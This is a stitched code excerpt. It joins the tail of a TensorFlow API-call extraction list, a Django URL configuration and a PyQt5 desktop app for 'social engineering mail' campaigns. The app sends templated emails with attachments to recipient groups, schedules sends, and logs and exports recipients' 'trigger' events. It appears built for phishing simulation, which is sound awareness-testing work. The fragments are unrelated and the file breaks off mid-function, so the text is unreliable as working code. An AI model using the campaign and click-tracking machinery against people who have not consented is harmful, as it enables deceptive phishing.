'from tensorflow import keras\n'), ((32561, 32604), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (32579, 32604), False, 'from tensorflow import keras\n'), ((3047, 3069), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (3067, 3069), True, 'import tensorflow as tf\n'), ((5716, 5741), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (5731, 5741), False, 'import os\n'), ((6550, 6562), 'json.load', 'json.load', (['f'], {}), '(f)\n', (6559, 6562), False, 'import json\n'), ((8426, 8467), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (8438, 8467), False, 'import os\n'), ((8917, 8956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*-*"""'], {}), "(self._tmp_dir, 'group*-*')\n", (8929, 8956), False, 'import os\n'), ((9901, 9940), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (9913, 9940), False, 'import os\n'), ((10416, 10428), 'json.load', 'json.load', (['f'], {}), '(f)\n', (10425, 10428), False, 'import json\n'), ((12334, 12373), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (12346, 12373), False, 'import os\n'), ((12877, 12889), 'json.load', 'json.load', (['f'], {}), '(f)\n', (12886, 12889), False, 'import json\n'), ((14813, 14850), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""foo.h5"""'], {}), "(self._tmp_dir, 'foo.h5')\n", (14825, 14850), False, 'import os\n'), ((14864, 14901), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""output"""'], {}), "(self._tmp_dir, 'output')\n", (14876, 14901), False, 'import os\n'), ((15780, 15818), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (15792, 15818), False, 'import os\n'), ((15969, 16005), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (15981, 16005), False, 'import os\n'), ((16612, 16650), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (16624, 16650), False, 'import os\n'), ((16801, 16837), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (16813, 16837), False, 'import os\n'), ((17506, 17544), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (17518, 17544), False, 'import os\n'), ((18223, 18259), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (18235, 18259), False, 'import os\n'), ((18865, 18903), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (18877, 18903), False, 'import os\n'), ((19054, 19090), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (19066, 19090), False, 'import os\n'), ((20017, 20058), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (20029, 20058), False, 'import os\n'), ((21284, 21325), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (21296, 21325), False, 'import os\n'), ((24123, 24154), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (24137, 24154), False, 'import os\n'), ((24548, 24575), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (24562, 24575), False, 'import os\n'), ((25808, 25839), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (25822, 25839), False, 'import os\n'), ((26233, 26260), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (26247, 26260), False, 'import os\n'), ((27452, 27478), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (27470, 27478), True, 'import tensorflow as tf\n'), ((29332, 29350), 'os.path.getsize', 'os.path.getsize', (['f'], {}), '(f)\n', (29347, 29350), False, 'import os\n'), ((33392, 33443), 'os.path.join', 'os.path.join', (['layers_model_output_dir', '"""model.json"""'], {}), "(layers_model_output_dir, 'model.json')\n", (33404, 33443), False, 'import os\n'), ((33634, 33677), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""model.json"""'], {}), "(graph_model_dir, 'model.json')\n", (33646, 33677), False, 'import os\n'), ((33725, 33768), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""group*.bin"""'], {}), "(graph_model_dir, 'group*.bin')\n", (33737, 33768), False, 'import os\n'), ((6478, 6519), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (6490, 6519), False, 'import os\n'), ((8014, 8024), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8022, 8024), True, 'import tensorflow as tf\n'), ((8273, 8283), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8281, 8283), True, 'import tensorflow as tf\n'), ((9794, 9804), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (9802, 9804), True, 'import tensorflow as tf\n'), ((10338, 10379), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (10350, 10379), False, 'import os\n'), ((12227, 12237), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (12235, 12237), True, 'import tensorflow as tf\n'), ((12799, 12840), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (12811, 12840), False, 'import os\n'), ((19344, 19354), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (19352, 19354), True, 'import tensorflow as tf\n'), ((20252, 20262), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20260, 20262), True, 'import tensorflow as tf\n'), ((20693, 20703), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20701, 20703), True, 'import tensorflow as tf\n'), ((21175, 21185), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (21183, 21185), True, 'import tensorflow as tf\n'), ((23289, 23299), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (23297, 23299), True, 'import tensorflow as tf\n'), ((24877, 24887), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (24885, 24887), True, 'import tensorflow as tf\n'), ((26561, 26571), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (26569, 26571), True, 'import tensorflow as tf\n'), ((27548, 27558), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (27556, 27558), True, 'import tensorflow as tf\n'), ((28957, 29000), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (28969, 29000), False, 'import os\n'), ((29212, 29257), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (29224, 29257), False, 'import os\n'), ((29899, 29944), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""model.json"""'], {}), "(sharded_model_dir, 'model.json')\n", (29911, 29944), False, 'import os\n'), ((30051, 30061), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30059, 30061), True, 'import tensorflow as tf\n'), ((30386, 30396), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30394, 30396), True, 'import tensorflow as tf\n'), ((31769, 31812), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (31781, 31812), False, 'import os\n'), ((32022, 32067), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (32034, 32067), False, 'import os\n'), ((12110, 12147), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (12122, 12147), False, 'import os\n'), ((14555, 14592), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (14567, 14592), False, 'import os\n'), ((27879, 27889), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (27886, 27889), True, 'import numpy as np\n'), ((30717, 30727), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (30724, 30727), True, 'import numpy as np\n'), ((3345, 3461), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', ([], {'inputs': "{'x': x}", 'outputs': "{'output': output}"}), "(inputs={\n 'x': x}, outputs={'output': output})\n", (3411, 3461), True, 'import tensorflow as tf\n')] |
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView
urlpatterns = [
path('api-auth/', include('rest_framework.urls')),
path('rest-auth/', include('rest_auth.urls')),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('admin/', admin.site.urls),
path('api/', include('core.api.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
if not settings.DEBUG:
urlpatterns += [re_path(r'^.*',
TemplateView.as_view(template_name='index.html'))]
| [
"django.conf.urls.static.static",
"django.views.generic.TemplateView.as_view",
"django.urls.path",
"django.urls.include"
] | [((406, 437), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (410, 437), False, 'from django.urls import path, include, re_path\n'), ((524, 585), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (530, 585), False, 'from django.conf.urls.static import static\n'), ((241, 271), 'django.urls.include', 'include', (['"""rest_framework.urls"""'], {}), "('rest_framework.urls')\n", (248, 271), False, 'from django.urls import path, include, re_path\n'), ((297, 322), 'django.urls.include', 'include', (['"""rest_auth.urls"""'], {}), "('rest_auth.urls')\n", (304, 322), False, 'from django.urls import path, include, re_path\n'), ((361, 399), 'django.urls.include', 'include', (['"""rest_auth.registration.urls"""'], {}), "('rest_auth.registration.urls')\n", (368, 399), False, 'from django.urls import path, include, re_path\n'), ((456, 480), 'django.urls.include', 'include', (['"""core.api.urls"""'], {}), "('core.api.urls')\n", (463, 480), False, 'from django.urls import path, include, re_path\n'), ((701, 749), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""index.html"""'}), "(template_name='index.html')\n", (721, 749), False, 'from django.views.generic import TemplateView\n')] |
#!/bin/bash
# -*- coding: UTF-8 -*-
# 基本控件都在这里面
from PyQt5.QtWebEngineWidgets import QWebEngineView
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog,
QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit,
QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView)
from PyQt5.QtGui import QPalette, QColor, QBrush
from PyQt5.QtCore import Qt, QDateTime
from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions
import qdarkstyle, sys
import mylibrary.genmail as gm
from GenAndSendMail import insert_send_mail
from server.database import Database
from server.sendmail import Smtp
from server.client import Client
from email import generator
from pandas import DataFrame
from copy import deepcopy
class SubWindow(QWidget):
def __init__(self):
super().__init__()
self.resize(400,100)
self.main_layout = QGridLayout()
self.setLayout(self.main_layout)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)
self.in_recipient = QLineEdit()
self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)
self.btn_send = QPushButton('寄送')
self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)
class MailserverUi(QMainWindow):
def __init__(self):
super().__init__()
setConfigOption('background', '#19232D')
setConfigOption('foreground', 'd')
setConfigOptions(antialias = True)
# self.resize(720,500)
self.init_ui()
self.data_smtp = []
self.data_db = []
self.data_logs = []
self.data_temp_logs = []
# self.sub_win = SubWindow()
# 默認狀態欄
self.status = self.statusBar()
self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: <EMAIL>")
# 標題欄
self.setWindowTitle("社交郵件工程")
self.setWindowOpacity(1) # 窗口透明度
self.main_layout.setSpacing(0)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_widget.setStyleSheet(
"""
QComboBox::item:checked {
height: 12px;
border: 1px solid #32414B;
margin-top: 0px;
margin-bottom: 0px;
padding: 4px;
padding-left: 0px;
}
"""
)
def init_ui(self):
# 創建視窗主部件
self.main_widget = QWidget()
# 創建主部件的網格佈局
self.main_layout = QGridLayout()
# 設置窗口主部件佈局為網格佈局
self.main_widget.setLayout(self.main_layout)
# 創建左側部件
self.left_widget = QWidget()
self.left_widget.setObjectName('left_widget')
self.left_layout = QGridLayout()
self.left_widget.setLayout(self.left_layout)
# 創建右側部件
self.right_widget = QWidget()
self.right_widget.setObjectName('right_widget')
self.right_layout = QGridLayout()
self.right_widget.setLayout(self.right_layout)
# 左側部件在第0行第0列,佔12行3列
self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3)
# 右側部件在第0行第3列,佔12行8列
self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)
# 設置視窗主部件
self.setCentralWidget(self.main_widget)
# 主要功能按鈕
self.btn_sendmail = QPushButton("發送信件")
self.btn_sendmail.clicked.connect(self.display_send_mail)
self.btn_smtp = QPushButton("系統設定")
self.btn_smtp.clicked.connect(self.display_smtp_setting)
self.btn_db = QPushButton("資料庫設定")
self.btn_db.clicked.connect(self.display_db_setting)
self.btn_update_eml = QPushButton("修改樣板")
self.btn_update_eml.clicked.connect(self.display_update_eml)
self.btn_get_logs = QPushButton("觸發明細")
self.btn_get_logs.clicked.connect(self.display_logs)
self.btn_download_logs = QPushButton("下載觸發明細")
self.btn_download_logs.clicked.connect(self.logs_download)
self.quit_btn = QPushButton("退出")
self.quit_btn.clicked.connect(self.quit_act)
self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)
self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)
self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3)
self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3)
self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3)
self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3)
# 主要功能查詢
self.in_data = QLineEdit()
self.in_data.setPlaceholderText("暫無")
self.left_layout.addWidget(self.in_data, 1, 0, 1, 3)
# 主要功能 log
self.query_result = QTableWidget()
self.left_layout.addWidget(self.query_result, 9, 0, 2, 3)
self.query_result.verticalHeader().setVisible(False)
self.right_display = GraphicsLayoutWidget()
self.right_layout.addWidget(self.right_display, 0, 3, 12, 8)
# 右側物件: sendmail
self.in_eml_type = QLineEdit()
self.in_eml_template = QLineEdit()
self.btn_eml_browse = QPushButton('瀏覽')
self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template))
self.in_recipient_group = QLineEdit()
self.in_recipient_excel = QLineEdit()
self.btn_recipient_browse = QPushButton('瀏覽')
self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel))
self.in_annex_file = QLineEdit()
self.btn_annex_file = QPushButton('瀏覽')
self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file))
self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime())
self.in_scheduler.setCalendarPopup(True)
self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm')
self.cb_scheduler = QCheckBox('使用')
self.btn_sendmail_start = QPushButton('執行')
self.btn_sendmail_start.clicked.connect(self.send_mail)
# 右側物件: smtp
self.in_smtp_host = QLineEdit()
self.in_smtp_port = QLineEdit()
self.in_smtp_user = QLineEdit()
self.in_smtp_password = QLineEdit()
self.cb_smtp_ssl = QCheckBox('使用')
self.in_smtp_test = QLineEdit()
self.btn_smtp_save = QPushButton('儲存')
self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp))
self.btn_smtp_test = QPushButton('測試')
self.btn_smtp_test.clicked.connect(self.show_sub_win)
# 右側物件: db
self.in_db_host = QLineEdit()
self.in_db_port = QLineEdit()
self.in_db_user = QLineEdit()
self.in_db_password = QLineEdit()
self.in_db_database = QLineEdit()
self.in_db_domain = QLineEdit()
self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址')
self.btn_db_save = QPushButton('儲存')
self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db))
# 右側物件: update eml
self.in_edit_sender = QLineEdit()
self.in_edit_sender_name = QLineEdit()
self.cb_edit_annex = QCheckBox('是')
self.in_edit_annex = QLineEdit()
self.btn_edit_annex = QPushButton('瀏覽')
self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex))
self.in_edit_subject = QLineEdit()
self.mail_tab = QTabWidget()
self.mail_tab.setDocumentMode(True)
self.mail_tab.currentChanged.connect(self.print_html)
self.mail_tab_1 = QWidget()
self.mail_tab_2 = QWidget()
self.mail_tab.addTab(self.mail_tab_1, 'Html')
self.mail_tab.addTab(self.mail_tab_2, 'Web')
self.tab_1 = QGridLayout()
self.tab_2 = QGridLayout()
self.tab_1.setContentsMargins(0,0,0,0)
self.tab_2.setContentsMargins(0,0,0,0)
self.mail_tab_1.setLayout(self.tab_1)
self.mail_tab_2.setLayout(self.tab_2)
self.in_edit_html = QTextEdit()
self.in_edit_web = QWebEngineView()
self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1)
self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1)
self.btn_edit_eml_reset = QPushButton('清除')
self.btn_edit_eml_reset.clicked.connect(self.eml_reset)
self.btn_edit_eml_read = QPushButton('讀取')
self.btn_edit_eml_read.clicked.connect(self.eml_open)
self.btn_edit_eml_save = QPushButton('儲存')
self.btn_edit_eml_save.clicked.connect(self.eml_save)
# 右側物件: logs
self.tbw_logs = QTableWidget()
self.tbw_logs.verticalHeader().setVisible(False)
self.cmb_logs_choice = QComboBox()
self.in_logs_data = QLineEdit()
self.in_logs_data.setPlaceholderText("輸入資料")
self.btn_logs_search = QPushButton('執行')
self.btn_logs_search.clicked.connect(self.logs_change)
def display_send_mail(self):
self.clear_layout(self.right_layout)
labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6)
self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1)
self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6)
self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1)
self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6)
self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1)
self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2)
def display_smtp_setting(self):
self.clear_layout(self.right_layout)
# 在右邊新增物件
labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2)
self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2)
def display_db_setting(self):
self.clear_layout(self.right_layout)
# 在右邊新增物件
labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2)
def display_update_eml(self):
self.clear_layout(self.right_layout)
labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"]
for i, label in enumerate(labels):
self.label = QLabel(label)
self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7)
self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7)
self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7)
self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2)
def display_logs(self):
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
self.clear_layout(self.right_layout)
self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8)
self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1)
self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2)
self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3)
self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2)
try:
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database()
self.data_logs = db.get_logs()
self.data_temp_logs = deepcopy(self.data_logs)
if self.data_logs:
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
col_lst = list(self.data_logs[0].keys())
self.cmb_logs_choice.clear()
self.cmb_logs_choice.addItems(col_lst)
self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tbw_logs.setHorizontalHeaderLabels(col_lst)
for i in range(row_num):
row_data = list(self.data_logs[i].values())
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(i, j, item)
except:
QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)
else:
db.__disconnect__()
def get_items_from_layout(self, layout):
return [layout.itemAt(i).widget() for i in range(layout.count())]
def save_data(self, data):
items = self.get_items_from_layout(self.right_layout)
data.clear()
try:
for item in items:
if type(item) == type(QLineEdit()):
data.append(item.text())
elif type(item) == type(QCheckBox()):
data.append(item.isChecked())
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
print(data)
def clear_layout(self, layout):
for i in reversed(range(layout.count())):
layout.itemAt(i).widget().setParent(None)
def open_eml(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
obj.setText(file_name)
def open_excel(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)")
obj.setText(file_name)
def open_word(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)")
obj.setText(file_name)
def open_annex(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)")
org_files = obj.text()
all_files = org_files + ',' + file_name if org_files else file_name
obj.setText(all_files)
def print_html(self, index):
if index:
self.in_edit_web.setHtml(self.in_edit_html.toPlainText())
def send_mail(self):
eml_type = self.in_eml_type.text()
eml_file = self.in_eml_template.text()
user_group = self.in_recipient_group.text()
mail_excel = self.in_recipient_excel.text()
annex_file = self.in_annex_file.text()
url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com'
try:
if self.cb_scheduler.isChecked():
my_time = self.in_scheduler.text()+':00'
client = Client()
client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time)
QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok)
else:
sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp()
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database()
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url)
sm.close()
db.__disconnect__()
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def show_sub_win(self):
if self.data_smtp:
self.sub_win = SubWindow()
self.sub_win.btn_send.clicked.connect(self.send_test)
self.sub_win.show()
else:
QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)
def send_test(self):
try:
if self.data_smtp:
mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3])
mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5])
error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text())
mailserver.close()
if error:
QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok)
else:
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
self.sub_win.in_recipient.clear()
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def eml_open(self):
self.in_edit_html.clear()
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
if not file_name:
return
header, html = gm.get_msg(file_name)
self.in_edit_sender.setText(header[2])
self.in_edit_sender_name.setText(header[1])
self.in_edit_subject.setText(header[0])
self.in_edit_html.insertPlainText(html)
def eml_save(self):
header, msg = [], ''
header.append(self.in_edit_subject.text())
header.append(self.in_edit_sender_name.text())
header.append(self.in_edit_sender.text())
header.append('<EMAIL>')
annex_file = self.in_edit_annex.text().split(',')
html = self.in_edit_html.toPlainText()
if not any(header[:3]) or not html:
return
try:
msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html)
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)')
with open(file_path, 'w') as outfile:
gen = generator.Generator(outfile)
gen.flatten(msg)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
def eml_reset(self):
items = self.get_items_from_layout(self.right_layout)
for item in items:
if type(item) == type(QLineEdit()):
item.clear()
self.cb_edit_annex.setChecked(False)
self.in_edit_html.clear()
def logs_change(self):
if not self.data_logs or not self.in_logs_data.text():
return
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
# header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'}
condition = self.cmb_logs_choice.currentText()
content = self.in_logs_data.text()
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
# self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
for i in range(row_num):
switch = False
if condition == 'date' and content in str(self.data_logs[i][condition]):
switch = True
elif self.data_logs[i][condition] == content:
switch = True
if switch:
self.tbw_logs.insertRow(self.tbw_logs.rowCount())
row_data = list(self.data_logs[i].values())
self.data_temp_logs.append(self.data_logs[i])
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item)
def logs_download(self):
if self.data_temp_logs:
try:
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)')
if not file_path:
return
df = DataFrame(self.data_temp_logs)
df.to_excel(file_path, index=False)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
